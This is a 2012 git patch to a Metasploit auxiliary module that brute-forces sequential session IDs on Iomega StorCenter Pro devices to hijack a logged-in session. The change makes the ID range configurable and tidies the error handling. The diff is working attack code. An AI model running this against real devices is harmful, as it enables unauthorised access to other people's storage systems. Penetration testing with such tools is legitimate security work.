From c606896122a4946b77409adb3ba81cc779badc32 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Thu, 24 May 2012 02:16:29 -0500 Subject: [PATCH] Multiple fixes and improvements: * Make session ID configurable based on feature #6894's suggestion. * Fix a potential bug when res is nil. * Use print_error() to make the error message more readable. --- .../admin/http/iomega_storcenterpro_sessionid.rb | 15 ++++++++------- 1 file changed, 8 insertions(+), 7 deletions(-) diff --git a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb index 9bf5c0105e..b54c9cc6ac 100644 --- a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb +++ b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb @@ -37,27 +37,28 @@ class Metasploit3 < Msf::Auxiliary register_options( [ Opt::RPORT(80), + OptInt.new('SID_MAX', [true, 'Maximum Session ID', 100]) ], self.class) end def run - 100.times do |x| + datastore['SID_MAX'].times do |x| begin - print_status("Searching for a valid session ID.") + print_status("Trying session ID #{x.to_s}") res = send_request_raw({ 'uri' => "/cgi-bin/makecgi-pro?job=show_home&session_id=#{x}", - 'method' => 'GET', + 'method' => 'GET' }, 25) - if (res.to_s =~ /Log out/) - print_status("Found valid session ID number #{x}!") - print_status("Browse to http://#{rhost}:#{rport}/cgi-bin/makecgi-pro?job=show_home&session_id=#{x}") + if (res and res.to_s =~ /Log out/) + print_status("Found valid session ID number #{x.to_s}!") + print_status("Browse to http://#{rhost}:#{rport}/cgi-bin/makecgi-pro?job=show_home&session_id=#{x.to_s}") break end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout - print_status("Unable to connect to #{rhost}:#{rport}.") + print_error("Unable to connect to #{rhost}:#{rport}") break rescue ::Timeout::Error, ::Errno::EPIPE end